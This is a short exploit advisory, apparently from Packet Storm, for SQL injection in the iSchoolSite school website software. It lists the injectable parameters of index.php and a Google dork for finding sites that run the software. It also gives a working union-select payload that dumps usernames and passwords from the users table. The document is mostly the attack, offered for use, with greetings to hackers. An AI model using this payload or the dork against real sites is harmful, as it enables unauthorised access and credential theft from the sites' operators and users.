iSchoolSite suffers from a remote SQL injection vulnerability.
3bb4573c38c18f4182a4f42fbe981360a4539c97e45c9e64d63cb6db79c46312==========================================================================
# Exploit Title: iSchoolSite SQL Injection Vulnerability
# Date: 16.10.2011
# Author: poach3r
# Software Link: http://www.ischoolsite.com/
# Tested on: Windows XP SP3
# Google Dork: "Powered by iSchoolSite" inurl:.php
# Price: $5000
==========================================================================
# Vulnerable File :
==>index.php<==
# Exploit :
http://127.0.0.1/path/index.php?task=calendar&pf=yes&pid=[SQL]&cmonth=[SQL]&cyear=[SQL]
http://127.0.0.1/path/index.php?task=news&view=yes&nid=[SQL]
http://127.0.0.1/path/index.php?task=&pf=yes&pid=[SQL]
# Demo :
http://127.0.0.1/path/index.php?task=news&view=yes&nid=-1/**/union/**/select/**/1,concat(username,0x3a,passsword),3,4,5,6,7/**/from/**/users/*
==========================================================================
# GreetZ To : All IRANIAN HackerZ
./End
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed